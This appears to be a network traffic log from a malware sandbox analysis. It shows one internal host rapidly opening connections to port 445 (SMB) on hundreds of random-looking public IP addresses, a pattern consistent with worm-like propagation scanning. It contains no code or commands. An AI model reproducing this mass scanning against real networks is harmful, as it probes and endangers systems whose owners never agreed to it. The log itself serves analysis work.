                                                                                            Dec 22, 2022 10:07:04.979300022 CET55457445192.168.2.3154.142.143.221
                                                                                            Dec 22, 2022 10:07:04.979480028 CET55458445192.168.2.3175.107.22.117
                                                                                            Dec 22, 2022 10:07:04.979856968 CET55462445192.168.2.358.208.5.32
                                                                                            Dec 22, 2022 10:07:04.980005980 CET55463445192.168.2.3204.136.172.133
                                                                                            Dec 22, 2022 10:07:04.980257034 CET55464445192.168.2.324.84.69.97
                                                                                            Dec 22, 2022 10:07:04.980611086 CET55466445192.168.2.329.161.9.204
                                                                                            Dec 22, 2022 10:07:04.981327057 CET55470445192.168.2.3217.95.145.133
                                                                                            Dec 22, 2022 10:07:04.981491089 CET55471445192.168.2.3219.17.129.144
                                                                                            Dec 22, 2022 10:07:04.981748104 CET55473445192.168.2.3198.48.11.38
                                                                                            Dec 22, 2022 10:07:04.981879950 CET55474445192.168.2.3113.68.21.38
                                                                                            Dec 22, 2022 10:07:04.982012033 CET55475445192.168.2.342.141.140.129
                                                                                            Dec 22, 2022 10:07:04.982330084 CET55477445192.168.2.3106.229.172.96
                                                                                            Dec 22, 2022 10:07:04.982583046 CET55479445192.168.2.3192.45.108.125
                                                                                            Dec 22, 2022 10:07:04.983047962 CET55482445192.168.2.3220.160.171.136
                                                                                            Dec 22, 2022 10:07:04.994313955 CET55493445192.168.2.399.208.108.47
                                                                                            Dec 22, 2022 10:07:04.994518995 CET55495445192.168.2.3108.10.39.16
                                                                                            Dec 22, 2022 10:07:04.994708061 CET55496445192.168.2.311.79.96.92
                                                                                            Dec 22, 2022 10:07:04.994771957 CET55497445192.168.2.3222.58.11.152
                                                                                            Dec 22, 2022 10:07:04.995712042 CET55507445192.168.2.3209.3.204.244
                                                                                            Dec 22, 2022 10:07:04.996253014 CET55508445192.168.2.3205.80.235.1
                                                                                            Dec 22, 2022 10:07:04.996377945 CET55509445192.168.2.3122.158.200.5
                                                                                            Dec 22, 2022 10:07:05.193334103 CET55354445192.168.2.3155.3.241.1
                                                                                            Dec 22, 2022 10:07:05.287043095 CET55357445192.168.2.3155.3.241.1
                                                                                            Dec 22, 2022 10:07:05.287166119 CET55293445192.168.2.3155.3.241.121
                                                                                            Dec 22, 2022 10:07:05.994752884 CET55511445192.168.2.389.180.247.42
                                                                                            Dec 22, 2022 10:07:06.103594065 CET55513445192.168.2.315.233.236.147
                                                                                            Dec 22, 2022 10:07:06.104273081 CET55514445192.168.2.384.46.41.168
                                                                                            Dec 22, 2022 10:07:06.104532957 CET55515445192.168.2.3179.25.9.92
                                                                                            Dec 22, 2022 10:07:06.104867935 CET55519445192.168.2.3146.166.109.228
                                                                                            Dec 22, 2022 10:07:06.105051041 CET55520445192.168.2.3207.236.223.205
                                                                                            Dec 22, 2022 10:07:06.105427027 CET55524445192.168.2.36.239.149.201
                                                                                            Dec 22, 2022 10:07:06.105659962 CET55525445192.168.2.374.39.182.152
                                                                                            Dec 22, 2022 10:07:06.105761051 CET55526445192.168.2.3118.104.126.249
                                                                                            Dec 22, 2022 10:07:06.106050968 CET55528445192.168.2.3110.198.76.169
                                                                                            Dec 22, 2022 10:07:06.106471062 CET55532445192.168.2.325.83.191.191
                                                                                            Dec 22, 2022 10:07:06.106594086 CET55533445192.168.2.345.182.123.161
                                                                                            Dec 22, 2022 10:07:06.106950045 CET55535445192.168.2.3175.242.27.65
                                                                                            Dec 22, 2022 10:07:06.107173920 CET55536445192.168.2.3152.229.164.253
                                                                                            Dec 22, 2022 10:07:06.107187033 CET55537445192.168.2.3205.239.208.167
                                                                                            Dec 22, 2022 10:07:06.107330084 CET55539445192.168.2.3216.94.97.4
                                                                                            Dec 22, 2022 10:07:06.107431889 CET55541445192.168.2.3222.249.167.140
                                                                                            Dec 22, 2022 10:07:06.107621908 CET55544445192.168.2.3172.212.119.205
                                                                                            Dec 22, 2022 10:07:06.108028889 CET55552445192.168.2.310.20.223.129
                                                                                            Dec 22, 2022 10:07:06.108819008 CET55568445192.168.2.317.190.162.27
                                                                                            Dec 22, 2022 10:07:06.109601021 CET55569445192.168.2.3108.80.111.206
                                                                                            Dec 22, 2022 10:07:06.109716892 CET55580445192.168.2.3203.47.79.164
                                                                                            Dec 22, 2022 10:07:06.109812021 CET55582445192.168.2.3202.249.154.192
                                                                                            Dec 22, 2022 10:07:06.109886885 CET55583445192.168.2.3160.105.172.71
                                                                                            Dec 22, 2022 10:07:06.111013889 CET55584445192.168.2.380.193.148.54
                                                                                            Dec 22, 2022 10:07:06.111062050 CET55585445192.168.2.33.131.222.102
                                                                                            Dec 22, 2022 10:07:06.111099005 CET55586445192.168.2.3126.203.185.141
                                                                                            Dec 22, 2022 10:07:06.399666071 CET44555586126.203.185.141192.168.2.3
                                                                                            Dec 22, 2022 10:07:06.896579981 CET54757445192.168.2.3155.100.73.4
                                                                                            Dec 22, 2022 10:07:07.037326097 CET54907445192.168.2.350.116.150.1
                                                                                            Dec 22, 2022 10:07:07.068764925 CET55588445192.168.2.389.180.247.43
                                                                                            Dec 22, 2022 10:07:07.084218025 CET55586445192.168.2.3126.203.185.141
                                                                                            Dec 22, 2022 10:07:07.102662086 CET55589445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:07.193396091 CET54759445192.168.2.3155.100.73.4
                                                                                            Dec 22, 2022 10:07:07.210330963 CET55591445192.168.2.389.55.105.61
                                                                                            Dec 22, 2022 10:07:07.210633039 CET55595445192.168.2.3126.81.62.166
                                                                                            Dec 22, 2022 10:07:07.210807085 CET55598445192.168.2.318.87.224.163
                                                                                            Dec 22, 2022 10:07:07.210891008 CET55599445192.168.2.347.92.138.109
                                                                                            Dec 22, 2022 10:07:07.211107969 CET55601445192.168.2.371.235.165.169
                                                                                            Dec 22, 2022 10:07:07.211138010 CET55602445192.168.2.324.241.199.124
                                                                                            Dec 22, 2022 10:07:07.211386919 CET55605445192.168.2.39.80.50.132
                                                                                            Dec 22, 2022 10:07:07.211564064 CET55607445192.168.2.3118.186.132.210
                                                                                            Dec 22, 2022 10:07:07.211663961 CET55610445192.168.2.348.139.65.142
                                                                                            Dec 22, 2022 10:07:07.211715937 CET55611445192.168.2.393.53.38.57
                                                                                            Dec 22, 2022 10:07:07.211941004 CET55615445192.168.2.3184.17.212.125
                                                                                            Dec 22, 2022 10:07:07.211996078 CET55616445192.168.2.381.55.79.180
                                                                                            Dec 22, 2022 10:07:07.212306976 CET55620445192.168.2.3123.241.216.217
                                                                                            Dec 22, 2022 10:07:07.212416887 CET55621445192.168.2.3198.117.95.163
                                                                                            Dec 22, 2022 10:07:07.212706089 CET55628445192.168.2.353.109.123.60
                                                                                            Dec 22, 2022 10:07:07.212938070 CET55629445192.168.2.3106.107.181.200
                                                                                            Dec 22, 2022 10:07:07.212938070 CET55630445192.168.2.359.162.199.26
                                                                                            Dec 22, 2022 10:07:07.213002920 CET55631445192.168.2.3190.103.30.70
                                                                                            Dec 22, 2022 10:07:07.213124037 CET55632445192.168.2.328.49.133.2
                                                                                            Dec 22, 2022 10:07:07.213706017 CET55645445192.168.2.3122.226.126.106
                                                                                            Dec 22, 2022 10:07:07.214342117 CET55657445192.168.2.313.106.220.29
                                                                                            Dec 22, 2022 10:07:07.216073036 CET55660445192.168.2.318.253.212.169
                                                                                            Dec 22, 2022 10:07:07.216245890 CET55662445192.168.2.364.4.73.94
                                                                                            Dec 22, 2022 10:07:07.216279030 CET55661445192.168.2.370.148.47.98
                                                                                            Dec 22, 2022 10:07:07.216361046 CET55663445192.168.2.344.174.128.195
                                                                                            Dec 22, 2022 10:07:07.216826916 CET55664445192.168.2.396.151.40.172
                                                                                            Dec 22, 2022 10:07:07.230873108 CET4455558950.116.150.2192.168.2.3
                                                                                            Dec 22, 2022 10:07:07.230993986 CET55589445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:07.231647015 CET55665445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:07.359896898 CET4455566550.116.150.2192.168.2.3
                                                                                            Dec 22, 2022 10:07:07.359978914 CET55665445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:07.372543097 CET44555586126.203.185.141192.168.2.3
                                                                                            Dec 22, 2022 10:07:07.756150007 CET55665445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:07.787231922 CET52482445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:07:07.787275076 CET55589445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:08.162333965 CET55665445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:08.176234961 CET44555583160.105.172.71192.168.2.3
                                                                                            Dec 22, 2022 10:07:08.177926064 CET55589445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:08.203401089 CET55668445192.168.2.389.180.247.44
                                                                                            Dec 22, 2022 10:07:08.240407944 CET55354445192.168.2.3155.3.241.1
                                                                                            Dec 22, 2022 10:07:08.334228992 CET55357445192.168.2.3155.3.241.1
                                                                                            Dec 22, 2022 10:07:08.335517883 CET55670445192.168.2.3110.183.40.135
                                                                                            Dec 22, 2022 10:07:08.335799932 CET55671445192.168.2.35.172.88.37
                                                                                            Dec 22, 2022 10:07:08.336565971 CET55681445192.168.2.3195.2.230.183
                                                                                            Dec 22, 2022 10:07:08.337253094 CET55694445192.168.2.3168.215.245.109
                                                                                            Dec 22, 2022 10:07:08.337789059 CET55699445192.168.2.3162.148.65.40
                                                                                            Dec 22, 2022 10:07:08.337924957 CET55702445192.168.2.3171.94.120.152
                                                                                            Dec 22, 2022 10:07:08.338041067 CET55703445192.168.2.374.29.251.90
                                                                                            Dec 22, 2022 10:07:08.338176966 CET55705445192.168.2.3194.98.250.132
                                                                                            Dec 22, 2022 10:07:08.338217974 CET55706445192.168.2.3110.86.168.206
                                                                                            Dec 22, 2022 10:07:08.338546038 CET55709445192.168.2.366.107.125.148
                                                                                            Dec 22, 2022 10:07:08.338761091 CET55712445192.168.2.3220.128.33.241
                                                                                            Dec 22, 2022 10:07:08.338880062 CET55714445192.168.2.3204.221.247.85
                                                                                            Dec 22, 2022 10:07:08.339099884 CET55716445192.168.2.340.188.51.234
                                                                                            Dec 22, 2022 10:07:08.339297056 CET55719445192.168.2.365.125.134.114
                                                                                            Dec 22, 2022 10:07:08.339345932 CET55720445192.168.2.3176.167.43.2
                                                                                            Dec 22, 2022 10:07:08.339581013 CET55724445192.168.2.3165.147.217.229
                                                                                            Dec 22, 2022 10:07:08.339673042 CET55725445192.168.2.3169.162.200.215
                                                                                            Dec 22, 2022 10:07:08.340133905 CET55732445192.168.2.371.81.12.206
                                                                                            Dec 22, 2022 10:07:08.340239048 CET55733445192.168.2.3152.148.189.192
                                                                                            Dec 22, 2022 10:07:08.340266943 CET55734445192.168.2.3202.164.156.2
                                                                                            Dec 22, 2022 10:07:08.340392113 CET55735445192.168.2.31.112.141.111
                                                                                            Dec 22, 2022 10:07:08.340434074 CET55736445192.168.2.3146.98.179.216
                                                                                            Dec 22, 2022 10:07:08.342717886 CET55740445192.168.2.3195.79.172.174
                                                                                            Dec 22, 2022 10:07:08.342879057 CET55741445192.168.2.3169.168.47.197
                                                                                            Dec 22, 2022 10:07:08.343286037 CET55742445192.168.2.38.11.46.243
                                                                                            Dec 22, 2022 10:07:08.343373060 CET55743445192.168.2.3135.157.76.51
                                                                                            Dec 22, 2022 10:07:08.552949905 CET55293445192.168.2.3155.3.241.121
                                                                                            Dec 22, 2022 10:07:08.943569899 CET55589445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:08.959197044 CET55665445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:09.272069931 CET55746445192.168.2.389.180.247.45
                                                                                            Dec 22, 2022 10:07:09.460004091 CET55748445192.168.2.3111.16.118.238
                                                                                            Dec 22, 2022 10:07:09.461870909 CET55758445192.168.2.3174.93.132.130
                                                                                            Dec 22, 2022 10:07:09.462384939 CET55763445192.168.2.357.178.77.127
                                                                                            Dec 22, 2022 10:07:09.463197947 CET55765445192.168.2.390.160.67.220
                                                                                            Dec 22, 2022 10:07:09.463378906 CET55767445192.168.2.3214.202.192.45
                                                                                            Dec 22, 2022 10:07:09.463553905 CET55768445192.168.2.398.156.170.134
                                                                                            Dec 22, 2022 10:07:09.463649988 CET55769445192.168.2.310.42.202.86
                                                                                            Dec 22, 2022 10:07:09.464072943 CET55772445192.168.2.377.5.196.47
                                                                                            Dec 22, 2022 10:07:09.464318037 CET55775445192.168.2.3112.200.243.7
                                                                                            Dec 22, 2022 10:07:09.464404106 CET55776445192.168.2.3111.190.142.114
                                                                                            Dec 22, 2022 10:07:09.464811087 CET55781445192.168.2.394.132.227.127
                                                                                            Dec 22, 2022 10:07:09.464992046 CET55782445192.168.2.3163.55.117.201
                                                                                            Dec 22, 2022 10:07:09.465095997 CET55783445192.168.2.331.206.138.197
                                                                                            Dec 22, 2022 10:07:09.465682030 CET55787445192.168.2.31.64.164.200
                                                                                            Dec 22, 2022 10:07:09.465965033 CET55789445192.168.2.334.20.92.161
                                                                                            Dec 22, 2022 10:07:09.466723919 CET55795445192.168.2.374.69.119.4
                                                                                            Dec 22, 2022 10:07:09.466852903 CET55796445192.168.2.3153.60.239.11
                                                                                            Dec 22, 2022 10:07:09.466972113 CET55797445192.168.2.3216.95.124.40
                                                                                            Dec 22, 2022 10:07:09.467180967 CET55798445192.168.2.3175.177.216.88
                                                                                            Dec 22, 2022 10:07:09.467324972 CET55799445192.168.2.397.138.111.142
                                                                                            Dec 22, 2022 10:07:09.468374968 CET55803445192.168.2.311.251.119.189
                                                                                            Dec 22, 2022 10:07:09.469445944 CET55805445192.168.2.380.83.28.164
                                                                                            Dec 22, 2022 10:07:09.470102072 CET55806445192.168.2.3153.232.245.160
                                                                                            Dec 22, 2022 10:07:09.470709085 CET55807445192.168.2.3178.5.58.218
                                                                                            Dec 22, 2022 10:07:09.471648932 CET55818445192.168.2.3223.100.114.56
                                                                                            Dec 22, 2022 10:07:09.478458881 CET55804445192.168.2.3188.154.172.116
                                                                                            Dec 22, 2022 10:07:10.213532925 CET55824445192.168.2.3155.100.73.4
                                                                                            Dec 22, 2022 10:07:10.352586985 CET55826445192.168.2.389.180.247.46
                                                                                            Dec 22, 2022 10:07:10.361558914 CET44555824155.100.73.4192.168.2.3
                                                                                            Dec 22, 2022 10:07:10.362860918 CET55824445192.168.2.3155.100.73.4
                                                                                            Dec 22, 2022 10:07:10.459423065 CET55589445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:10.553122997 CET55665445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:10.586031914 CET55828445192.168.2.310.215.128.68
                                                                                            Dec 22, 2022 10:07:10.586040020 CET55829445192.168.2.3200.40.178.129
                                                                                            Dec 22, 2022 10:07:10.586293936 CET55831445192.168.2.3222.64.29.230
                                                                                            Dec 22, 2022 10:07:10.586436987 CET55832445192.168.2.3208.61.204.234
                                                                                            Dec 22, 2022 10:07:10.586502075 CET55833445192.168.2.3171.37.23.2
                                                                                            Dec 22, 2022 10:07:10.588044882 CET55836445192.168.2.342.43.51.81
                                                                                            Dec 22, 2022 10:07:10.588242054 CET55839445192.168.2.3177.199.116.211
                                                                                            Dec 22, 2022 10:07:10.596252918 CET55840445192.168.2.364.29.167.135
                                                                                            Dec 22, 2022 10:07:10.596707106 CET55846445192.168.2.399.179.118.145
                                                                                            Dec 22, 2022 10:07:10.596751928 CET55847445192.168.2.3152.0.152.10
                                                                                            Dec 22, 2022 10:07:10.596801043 CET55845445192.168.2.3205.104.87.173
                                                                                            Dec 22, 2022 10:07:10.596940041 CET55851445192.168.2.3187.202.99.230
                                                                                            Dec 22, 2022 10:07:10.597096920 CET55854445192.168.2.3179.49.213.247
                                                                                            Dec 22, 2022 10:07:10.597352982 CET55859445192.168.2.394.214.250.143
                                                                                            Dec 22, 2022 10:07:10.597352982 CET55860445192.168.2.352.47.184.76
                                                                                            Dec 22, 2022 10:07:10.597454071 CET55862445192.168.2.331.190.220.251
                                                                                            Dec 22, 2022 10:07:10.597456932 CET55861445192.168.2.37.235.112.97
                                                                                            Dec 22, 2022 10:07:10.597553968 CET55863445192.168.2.381.14.85.135
                                                                                            Dec 22, 2022 10:07:10.597948074 CET55867445192.168.2.3156.224.186.33
                                                                                            Dec 22, 2022 10:07:10.598354101 CET55878445192.168.2.3214.213.131.128
                                                                                            Dec 22, 2022 10:07:10.598612070 CET55885445192.168.2.3155.239.132.215
                                                                                            Dec 22, 2022 10:07:10.599014044 CET55895445192.168.2.3216.254.20.118
                                                                                            Dec 22, 2022 10:07:10.600905895 CET55898445192.168.2.397.166.78.101
                                                                                            Dec 22, 2022 10:07:10.601007938 CET55899445192.168.2.3193.193.157.52
                                                                                            Dec 22, 2022 10:07:10.601250887 CET55900445192.168.2.3150.0.154.22
                                                                                            Dec 22, 2022 10:07:10.601264954 CET55901445192.168.2.3179.61.87.69
                                                                                            Dec 22, 2022 10:07:10.834430933 CET55824445192.168.2.3155.100.73.4
                                                                                            Dec 22, 2022 10:07:11.272006989 CET55824445192.168.2.3155.100.73.4
                                                                                            Dec 22, 2022 10:07:11.446012974 CET55904445192.168.2.389.180.247.47
                                                                                            Dec 22, 2022 10:07:11.713073015 CET55907445192.168.2.3166.32.55.84
                                                                                            Dec 22, 2022 10:07:11.714490891 CET55912445192.168.2.3145.82.101.155
                                                                                            Dec 22, 2022 10:07:11.715101004 CET55919445192.168.2.351.71.114.240
                                                                                            Dec 22, 2022 10:07:11.716170073 CET55929445192.168.2.3187.73.254.233
                                                                                            Dec 22, 2022 10:07:11.725816011 CET55932445192.168.2.3203.30.225.62
                                                                                            Dec 22, 2022 10:07:11.725955963 CET55935445192.168.2.37.253.177.130
                                                                                            Dec 22, 2022 10:07:11.726006985 CET55934445192.168.2.3131.155.88.52
                                                                                            Dec 22, 2022 10:07:11.726139069 CET55936445192.168.2.365.37.53.42
                                                                                            Dec 22, 2022 10:07:11.726288080 CET55938445192.168.2.3198.127.203.133
                                                                                            Dec 22, 2022 10:07:11.726454973 CET55942445192.168.2.3159.203.126.75
                                                                                            Dec 22, 2022 10:07:11.726526976 CET55943445192.168.2.3202.232.123.217
                                                                                            Dec 22, 2022 10:07:11.726756096 CET55947445192.168.2.398.246.80.181
                                                                                            Dec 22, 2022 10:07:11.726821899 CET55949445192.168.2.3214.102.235.16
                                                                                            Dec 22, 2022 10:07:11.726892948 CET55950445192.168.2.3121.58.198.247
                                                                                            Dec 22, 2022 10:07:11.727099895 CET55954445192.168.2.3171.43.103.161
                                                                                            Dec 22, 2022 10:07:11.727231979 CET55956445192.168.2.382.191.90.26
                                                                                            Dec 22, 2022 10:07:11.727493048 CET55962445192.168.2.316.45.208.73
                                                                                            Dec 22, 2022 10:07:11.727591038 CET55963445192.168.2.32.167.54.64
                                                                                            Dec 22, 2022 10:07:11.727639914 CET55964445192.168.2.3199.208.143.74
                                                                                            Dec 22, 2022 10:07:11.727730036 CET55965445192.168.2.3186.89.238.107
                                                                                            Dec 22, 2022 10:07:11.727746010 CET55966445192.168.2.3107.77.213.167
                                                                                            Dec 22, 2022 10:07:11.727957964 CET55970445192.168.2.359.108.224.204
                                                                                            Dec 22, 2022 10:07:11.728996038 CET55977445192.168.2.329.230.184.169
                                                                                            Dec 22, 2022 10:07:11.729562998 CET55978445192.168.2.310.21.206.6
                                                                                            Dec 22, 2022 10:07:11.729587078 CET55979445192.168.2.3223.227.132.109
                                                                                            Dec 22, 2022 10:07:11.729665041 CET55980445192.168.2.312.119.74.16
                                                                                            Dec 22, 2022 10:07:11.831756115 CET44555942159.203.126.75192.168.2.3
                                                                                            Dec 22, 2022 10:07:11.934477091 CET44555929187.73.254.233192.168.2.3
                                                                                            Dec 22, 2022 10:07:12.178289890 CET55824445192.168.2.3155.100.73.4
                                                                                            Dec 22, 2022 10:07:12.334526062 CET55942445192.168.2.3159.203.126.75
                                                                                            Dec 22, 2022 10:07:12.440737963 CET44555942159.203.126.75192.168.2.3
                                                                                            Dec 22, 2022 10:07:12.443866014 CET55929445192.168.2.3187.73.254.233
                                                                                            Dec 22, 2022 10:07:12.522515059 CET55984445192.168.2.389.180.247.48
                                                                                            Dec 22, 2022 10:07:12.660661936 CET44555929187.73.254.233192.168.2.3
                                                                                            Dec 22, 2022 10:07:12.836699009 CET55991445192.168.2.3213.252.7.92
                                                                                            Dec 22, 2022 10:07:12.837022066 CET55998445192.168.2.350.160.80.83
                                                                                            Dec 22, 2022 10:07:12.837732077 CET56008445192.168.2.3204.189.217.136
                                                                                            Dec 22, 2022 10:07:12.838396072 CET56011445192.168.2.3145.77.122.47
                                                                                            Dec 22, 2022 10:07:12.850550890 CET56012445192.168.2.3157.241.95.148
                                                                                            Dec 22, 2022 10:07:12.850763083 CET56017445192.168.2.360.183.157.226
                                                                                            Dec 22, 2022 10:07:12.850991964 CET56020445192.168.2.3174.195.228.95
                                                                                            Dec 22, 2022 10:07:12.850991964 CET56021445192.168.2.3170.164.127.240
                                                                                            Dec 22, 2022 10:07:12.851001024 CET56019445192.168.2.3140.4.87.25
                                                                                            Dec 22, 2022 10:07:12.851083994 CET56022445192.168.2.3122.26.219.180
                                                                                            Dec 22, 2022 10:07:12.851363897 CET56028445192.168.2.3146.22.116.112
                                                                                            Dec 22, 2022 10:07:12.851573944 CET56033445192.168.2.3168.166.246.70
                                                                                            Dec 22, 2022 10:07:12.851768970 CET56038445192.168.2.3164.193.226.178
                                                                                            Dec 22, 2022 10:07:12.851808071 CET56039445192.168.2.398.24.227.12
                                                                                            Dec 22, 2022 10:07:12.851927996 CET56041445192.168.2.3163.149.51.126
                                                                                            Dec 22, 2022 10:07:12.852085114 CET56045445192.168.2.397.39.114.219
                                                                                            Dec 22, 2022 10:07:12.852149963 CET56046445192.168.2.39.88.119.111
                                                                                            Dec 22, 2022 10:07:12.852341890 CET56049445192.168.2.34.87.64.126
                                                                                            Dec 22, 2022 10:07:12.852525949 CET56052445192.168.2.3108.135.242.58
                                                                                            Dec 22, 2022 10:07:12.852674961 CET56055445192.168.2.387.89.17.200
                                                                                            Dec 22, 2022 10:07:12.852677107 CET56053445192.168.2.3108.191.195.82
                                                                                            Dec 22, 2022 10:07:12.852699041 CET56054445192.168.2.3106.235.121.221
                                                                                            Dec 22, 2022 10:07:12.853977919 CET56057445192.168.2.375.202.199.65
                                                                                            Dec 22, 2022 10:07:12.854084969 CET56058445192.168.2.3207.97.215.101
                                                                                            Dec 22, 2022 10:07:12.854324102 CET56059445192.168.2.3136.112.215.253
                                                                                            Dec 22, 2022 10:07:12.854367018 CET56060445192.168.2.397.170.91.170
                                                                                            Dec 22, 2022 10:07:13.475274086 CET55589445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:13.605036974 CET56064445192.168.2.389.180.247.49
                                                                                            Dec 22, 2022 10:07:13.725645065 CET55665445192.168.2.350.116.150.2
                                                                                            Dec 22, 2022 10:07:13.945174932 CET56072445192.168.2.370.6.55.135
                                                                                            Dec 22, 2022 10:07:13.945656061 CET56082445192.168.2.3130.0.209.13
                                                                                            Dec 22, 2022 10:07:13.945981026 CET56089445192.168.2.373.121.134.139
                                                                                            Dec 22, 2022 10:07:13.946502924 CET56092445192.168.2.3187.57.146.183
                                                                                            Dec 22, 2022 10:07:13.975354910 CET55824445192.168.2.3155.100.73.4
                                                                                            Dec 22, 2022 10:07:13.976744890 CET56093445192.168.2.3134.144.203.57
                                                                                            Dec 22, 2022 10:07:13.977659941 CET56094445192.168.2.3170.179.207.205
                                                                                            Dec 22, 2022 10:07:13.978631973 CET56095445192.168.2.3111.137.84.189
                                                                                            Dec 22, 2022 10:07:13.979615927 CET56096445192.168.2.396.26.234.120
                                                                                            Dec 22, 2022 10:07:13.980120897 CET56098445192.168.2.3148.109.159.9
                                                                                            Dec 22, 2022 10:07:13.980410099 CET56099445192.168.2.355.89.18.167
                                                                                            Dec 22, 2022 10:07:13.980612993 CET56100445192.168.2.356.209.59.110
                                                                                            Dec 22, 2022 10:07:13.980771065 CET56101445192.168.2.35.22.112.138
                                                                                            Dec 22, 2022 10:07:13.981326103 CET56104445192.168.2.3140.80.244.31
                                                                                            Dec 22, 2022 10:07:13.981590033 CET56107445192.168.2.3215.99.11.147
                                                                                            Dec 22, 2022 10:07:13.981780052 CET56108445192.168.2.394.229.159.174
                                                                                            Dec 22, 2022 10:07:13.982062101 CET56111445192.168.2.3138.244.10.230
                                                                                            Dec 22, 2022 10:07:13.982271910 CET56114445192.168.2.37.181.188.104
                                                                                            Dec 22, 2022 10:07:13.982425928 CET56115445192.168.2.338.78.140.250
                                                                                            Dec 22, 2022 10:07:13.982791901 CET56119445192.168.2.342.121.195.217
                                                                                            Dec 22, 2022 10:07:13.983212948 CET56124445192.168.2.3101.77.245.17
                                                                                            Dec 22, 2022 10:07:13.983788013 CET56131445192.168.2.3194.208.222.171
                                                                                            Dec 22, 2022 10:07:13.983928919 CET56132445192.168.2.3203.195.70.181
                                                                                            Dec 22, 2022 10:07:13.984071016 CET56133445192.168.2.335.203.14.68
                                                                                            Dec 22, 2022 10:07:13.984185934 CET56134445192.168.2.3177.113.65.175
                                                                                            Dec 22, 2022 10:07:13.984282970 CET56135445192.168.2.340.109.207.210
                                                                                            Dec 22, 2022 10:07:13.984810114 CET56140445192.168.2.320.45.87.228
                                                                                            Dec 22, 2022 10:07:14.001620054 CET44556082130.0.209.13192.168.2.3
                                                                                            Dec 22, 2022 10:07:14.319057941 CET55354445192.168.2.3155.3.241.1
                                                                                            Dec 22, 2022 10:07:14.412790060 CET55357445192.168.2.3155.3.241.1
                                                                                            Dec 22, 2022 10:07:14.506582975 CET56082445192.168.2.3130.0.209.13
                                                                                            Dec 22, 2022 10:07:14.569391966 CET44556082130.0.209.13192.168.2.3
                                                                                            Dec 22, 2022 10:07:14.688707113 CET56145445192.168.2.389.180.247.50
                                                                                            Dec 22, 2022 10:07:14.756620884 CET54830445192.168.2.3201.187.138.1
                                                                                            Dec 22, 2022 10:07:14.944350958 CET52485445192.168.2.345.117.145.2
                                                                                            Dec 22, 2022 10:07:15.070566893 CET56153445192.168.2.3158.228.125.208
                                                                                            Dec 22, 2022 10:07:15.071384907 CET56163445192.168.2.3162.59.220.186
                                                                                            Dec 22, 2022 10:07:15.072292089 CET56170445192.168.2.3214.136.30.97
                                                                                            Dec 22, 2022 10:07:15.072983027 CET56173445192.168.2.3147.219.243.47
                                                                                            Dec 22, 2022 10:07:15.084743023 CET55293445192.168.2.3155.3.241.121
                                                                                            Dec 22, 2022 10:07:15.101218939 CET56174445192.168.2.3102.158.48.81
                                                                                            Dec 22, 2022 10:07:15.101871014 CET56175445192.168.2.34.193.176.184
                                                                                            Dec 22, 2022 10:07:15.102579117 CET56176445192.168.2.3160.101.140.198
                                                                                            Dec 22, 2022 10:07:15.102916002 CET56178445192.168.2.3115.244.149.44
                                                                                            Dec 22, 2022 10:07:15.103137016 CET56179445192.168.2.359.28.235.251
                                                                                            Dec 22, 2022 10:07:15.103319883 CET56180445192.168.2.336.16.40.99
                                                                                            Dec 22, 2022 10:07:15.103430986 CET56181445192.168.2.3188.12.13.79
                                                                                            Dec 22, 2022 10:07:15.103732109 CET56184445192.168.2.3119.5.152.128
                                                                                            Dec 22, 2022 10:07:15.104027033 CET56187445192.168.2.3166.128.242.167
                                                                                            Dec 22, 2022 10:07:15.104181051 CET56188445192.168.2.3223.73.190.158
                                                                                            Dec 22, 2022 10:07:15.104516029 CET56191445192.168.2.361.100.212.60
                                                                                            Dec 22, 2022 10:07:15.104912043 CET56194445192.168.2.3221.54.18.229
                                                                                            Dec 22, 2022 10:07:15.105026960 CET56195445192.168.2.3154.207.90.194
                                                                                            Dec 22, 2022 10:07:15.105308056 CET56199445192.168.2.327.244.137.59
                                                                                            Dec 22, 2022 10:07:15.106000900 CET56204445192.168.2.332.180.213.108
                                                                                            Dec 22, 2022 10:07:15.106580019 CET56211445192.168.2.342.79.2.206
                                                                                            Dec 22, 2022 10:07:15.106674910 CET56212445192.168.2.3118.237.132.196
                                                                                            Dec 22, 2022 10:07:15.106777906 CET56213445192.168.2.313.202.65.83
                                                                                            Dec 22, 2022 10:07:15.106870890 CET56214445192.168.2.3145.180.7.207
                                                                                            Dec 22, 2022 10:07:15.106971979 CET56215445192.168.2.375.189.93.168
                                                                                            Dec 22, 2022 10:07:15.107323885 CET56220445192.168.2.348.164.211.0
                                                                                            Dec 22, 2022 10:07:15.107840061 CET56222445192.168.2.357.3.106.201
                                                                                            Dec 22, 2022 10:07:15.287910938 CET54804445192.168.2.3201.187.138.182
                                                                                            Dec 22, 2022 10:07:15.334786892 CET54828445192.168.2.3201.187.138.1
                                                                                            Dec 22, 2022 10:07:15.401300907 CET44556153158.228.125.208192.168.2.3
                                                                                            Dec 22, 2022 10:07:15.741322994 CET56226445192.168.2.389.180.247.51
                                                                                            Dec 22, 2022 10:07:15.918587923 CET56153445192.168.2.3158.228.125.208
                                                                                            Dec 22, 2022 10:07:16.199172020 CET56244445192.168.2.3113.190.129.127
                                                                                            Dec 22, 2022 10:07:16.199436903 CET56235445192.168.2.3221.116.96.216
                                                                                            Dec 22, 2022 10:07:16.201525927 CET56250445192.168.2.3106.81.11.200
                                                                                            Dec 22, 2022 10:07:16.202498913 CET56253445192.168.2.3214.31.41.244
                                                                                            Dec 22, 2022 10:07:16.210997105 CET56256445192.168.2.3150.18.181.202
                                                                                            Dec 22, 2022 10:07:16.211946964 CET56257445192.168.2.3158.148.57.239
                                                                                            Dec 22, 2022 10:07:16.212630033 CET56258445192.168.2.3204.179.42.230
                                                                                            Dec 22, 2022 10:07:16.213160992 CET56260445192.168.2.336.22.147.136
                                                                                            Dec 22, 2022 10:07:16.213288069 CET56261445192.168.2.329.153.250.141
